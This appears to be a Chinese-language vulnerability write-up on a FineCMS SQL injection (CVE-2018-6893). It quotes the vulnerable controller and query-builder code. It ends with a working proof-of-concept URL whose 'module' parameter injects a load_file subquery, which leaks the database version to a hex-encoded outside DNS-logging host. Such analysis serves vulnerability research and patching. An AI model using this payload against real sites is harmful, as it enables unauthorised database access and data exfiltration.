Finecms SQL注入漏洞 [CVE-2018-6893]
finecms/dayrui/controllers/member/Api.php 590行左右
public function checktitle() {
$id = (int)$this->input->get('id');
$title = $this->input->get('title', TRUE);
$module = $this->input->get('module');
(!$title || !$module) && exit('');
$num = $this->db->where('id<>', $id)->where('title', $title)->count_all_results(SITE_ID.'_'.$module);
$num ? exit(fc_lang('<font color=red>'.fc_lang('重复').'</font>')) : exit('');
public function count_all_results($table = '', $reset = TRUE)
if ($table !== '')
// ORDER BY usage is often problematic here (most notably
// on Microsoft SQL Server) and ultimately unnecessary
// for selecting COUNT(*) ...
if ( ! empty($this->qb_orderby))
$orderby = $this->qb_orderby;
$this->qb_orderby = NULL;
$result = ($this->qb_distinct === TRUE OR ! empty($this->qb_groupby) OR ! empty($this->qb_cache_groupby) OR $this->qb_limit OR $this->qb_offset)
? $this->query($this->_count_string.$this->protect_identifiers('numrows')."\nFROM (\n".$this->_compile_select()."\n) CI_count_all_results")
: $this->query($this->_compile_select($this->_count_string.$this->protect_identifiers('numrows')));
if ($reset === TRUE)
// If we've previously reset the qb_orderby values, get them back
elseif ( ! isset($this->qb_orderby))
$this->qb_orderby = $orderby;
if ($result->num_rows() === 0)
return 0;
$row = $result->row();
return (int) $row->numrows;
protected function _track_aliases($table)
if (is_array($table))
foreach ($table as $t)
// Does the string contain a comma? If so, we need to separate
// the string into discreet statements
if (strpos($table, ',') !== FALSE)
return $this->_track_aliases(explode(',', $table));
// if a table alias is used we can recognize it by a space
if (strpos($table, ' ') !== FALSE)
// if the alias is written with the AS keyword, remove it
$table = preg_replace('/\s+AS\s+/i', ' ', $table);
// Grab the alias
$table = trim(strrchr($table, ' '));
// Store the alias, if it doesn't already exist
if ( ! in_array($table, $this->qb_aliased_tables, TRUE))
$this->qb_aliased_tables[] = $table;
if ($this->qb_caching === TRUE && ! in_array($table, $this->qb_cache_aliased_tables, TRUE))
$this->qb_cache_aliased_tables[] = $table;
$this->qb_cache_exists[] = 'aliased_tables';
public function from($from)
foreach ((array) $from as $val)
if (strpos($val, ',') !== FALSE)
foreach (explode(',', $val) as $v)
$v = trim($v);
$this->qb_from[] = $v = $this->protect_identifiers($v, TRUE, NULL, FALSE);
if ($this->qb_caching === TRUE)
$this->qb_cache_from[] = $v;
$this->qb_cache_exists[] = 'from';
$val = trim($val);
// Extract any aliases that might exist. We use this information
// in the protect_identifiers to know whether to add a table prefix
$this->qb_from[] = $val = $this->protect_identifiers($val, TRUE, NULL, FALSE);
if ($this->qb_caching === TRUE)
$this->qb_cache_from[] = $val;
$this->qb_cache_exists[] = 'from';
return $this;
http://localhost/index.php?s=member&c=api&m=checktitle&id=13&title=123&module=news,(select load_file(concat(0x5c5c5c5c,version(),0x2e6d7973716c2e61687a6935672e636579652e696f5c5c616263)))) as total
4 条评论
可输入 255 字